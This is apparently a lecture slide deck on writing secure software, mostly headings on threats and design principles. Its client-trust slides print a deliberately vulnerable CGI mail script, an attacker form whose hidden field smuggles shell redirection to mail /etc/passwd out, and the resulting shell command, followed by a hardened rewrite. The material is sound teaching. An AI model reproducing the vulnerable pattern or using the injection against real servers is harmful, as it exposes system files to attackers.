Writing Secure Software

David A. Mundie
Professor
Software Engineering Institute

Spring 2001

95-755

Preliminaries


Is there a problem?


Why Software Security is Hard


Penetrate and Patch is Bad


Environment is Important


Threats to Software


1. Flooding


2. Replay


3. Trusting Untrustworthy Information


4. Reliance on External Systems


5. Naming Conflicts


6. Unexpected Quantity of Data


7. Debugging Modes


8. Loss of Control During Software Changes


9. Inadequate Testing


10. Physical Security


Outline


Risk: Random Number Generation


Guessing the Seed


Risk: Buffer Overflow


Risk: Client Trust

#!/usr/local/bin/python
# Python 2 CGI script from the slides: mails the form's "contents" field
# to the address given in the form's "to" field.
import cgi, os
print "Content-type: text/html"; print
form = cgi.FieldStorage()
message = form["contents"].value
# Both values come straight from the client; neither one is checked.
recipient = form["to"].value
tmpfile = open("/tmp/cgi-mail", "w")
tmpfile.write(message)
tmpfile.close()
# The recipient is concatenated, unquoted, into a string that the shell
# parses, so shell syntax in the "to" field becomes part of the command.
os.system("/bin/mail " + recipient + " < /tmp/cgi-mail")
os.unlink("/tmp/cgi-mail")
print "<html><h3>Message sent.</h3></html>"

Client Trust Cont'd

<form action="http://www.list.org/send-mail.py" method="post">
<h3>Edit Message</h3>
<input type="text" name="contents"/>
<input type="hidden" name="to"
       value="attacker@somedomain.com < /etc/passwd #">
<input type="submit" value="Submit">
</form>

Client Trust Cont'd

/bin/mail attacker@somedomain.com < /etc/passwd # < /tmp/cgi-mail
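As an added example, not part of the original slides: a hardened rewrite of the send-mail handler in Python 3. It reproduces the exact shell string the original os.system() call would execute for the hidden-field value above, then shows the defensive counterpart: the recipient is checked against a strict address pattern before use, the message goes to /bin/mail on stdin instead of through a shared file in /tmp, and the program is started from an argument list with no shell, so `<` and `#` are ordinary bytes rather than redirection and comment syntax. The function names, the address pattern, and the injectable `runner` parameter (so the logic can be exercised on a machine with no mail binary) are assumptions of this example; the form values are taken as already parsed.

```python
import re
import subprocess
from typing import Callable, List

# Strict allowlist for a plain mail address (assumed pattern; tighten it to
# local policy).  Whitespace and shell metacharacters such as '<' or '#'
# cannot match, so an injected value is rejected before any process starts.
RECIPIENT_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

# The hidden "to" field from the slide's attacker form (constructed here).
INJECTED_RECIPIENT = "attacker@somedomain.com < /etc/passwd #"


def unsafe_command(recipient: str) -> str:
    """Reproduce the string the original script hands to the shell through
    os.system(): the recipient is concatenated in unquoted, so the shell
    interprets whatever the client supplied as redirections and comments."""
    return "/bin/mail " + recipient + " < /tmp/cgi-mail"


def validate_recipient(recipient: str) -> str:
    """Return the recipient unchanged if it is a plain address, else raise."""
    if not RECIPIENT_RE.fullmatch(recipient):
        raise ValueError("recipient is not a plain mail address: %r" % recipient)
    return recipient


def safe_argv(recipient: str) -> List[str]:
    """Build the argument vector for /bin/mail.  Passed as a list with no
    shell, each element reaches the program as exactly one argument; '<'
    and '#' inside an address would be literal bytes, not shell syntax."""
    return ["/bin/mail", validate_recipient(recipient)]


def send_mail(recipient: str, message: str,
              runner: Callable[..., subprocess.CompletedProcess] = subprocess.run) -> int:
    """Hardened replacement for the body of the CGI handler.

    * the recipient is validated before it is used anywhere;
    * the message is written to the child's stdin, so no temporary file
      and no os.system() command string are needed at all;
    * `runner` is injectable (assumption of this example) so the code can
      be tested without a real /bin/mail.
    """
    argv = safe_argv(recipient)
    result = runner(argv, input=message.encode("utf-8"), check=True)
    return result.returncode


if __name__ == "__main__":
    # Show the command the original code would have executed for the
    # attacker's hidden field, then show the hardened path refusing it.
    print("shell would run:", unsafe_command(INJECTED_RECIPIENT))
    try:
        send_mail(INJECTED_RECIPIENT, "hello")
    except ValueError as exc:
        print("rejected:", exc)
```

The validation and the no-shell invocation are independent layers: the allowlist stops the bad value at the boundary, and the argument list guarantees that even a value which slipped past a looser check could not change what program runs or what it reads.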

Risk: Authentication


Types of Authentication


Guiding Principle #1

Identify and secure the weakest link


Guiding Principle #2

Provide defense in depth


Guiding Principle #3

Be reluctant to trust


Guiding Principle #4

It is hard to hide secrets


Guiding Principle #5

Principle of Least Privilege


Guiding Principle #6

Fail and recover gracefully


Guiding Principle #7

Compartmentalize your system


Guiding Principle #8

KISS - keep it simple, stupid


Guiding Principle #9

Don't help potential attackers, deter them


Guiding Principle #10

Always question anything related to security


Some Terms


Process Definition


A Classic Tradeoff

Security vs. Functionality


Security as Risk Management

There is no such thing as totally secure

Spiral model works here too

All sound software engineering principles apply


Some Principles


Security and Project Planning


Security and Software Architecture


Create Security Guidelines


But: Guidelines No Panacea


Open Code vs. Closed Code


Security Analysis


Need-Satisfaction Measures

  1. Effectiveness
    • Necessary
    • Sufficient
  2. Responsiveness
  3. Correctness
    • Completeness
    • Consistency
    • Traceability
    • Provably correct
  4. Verifiability
    • Testability

Performance Measures

  1. Dependability
    • Availability
    • Reliability (accuracy)
    • Safety
    • Trustworthiness (vulnerability + accountability)
    • Security
  2. Efficiency/Resource Utilization
    • Capacity
    • Latency
    • Throughput
  3. Usability
    • Error-proneness
    • Operability
  4. Fidelity

Maintenance Measures

  1. Maintainability
    • Modifiability
    • Adaptability
    • Evolvability
    • Extensibility
  2. Understandability
    • Complexity
    • Simplicity
    • Structuredness
    • Readability (self-descriptive, concise)

Adaptive Measures

  1. Interoperability
  2. Portability
  3. Scalability
  4. Reusability

Organizational Measures

  1. Cost of ownership
    • Cost of operation
    • Cost of maintenance
    • Lifetime of Operational Capability
  2. Productivity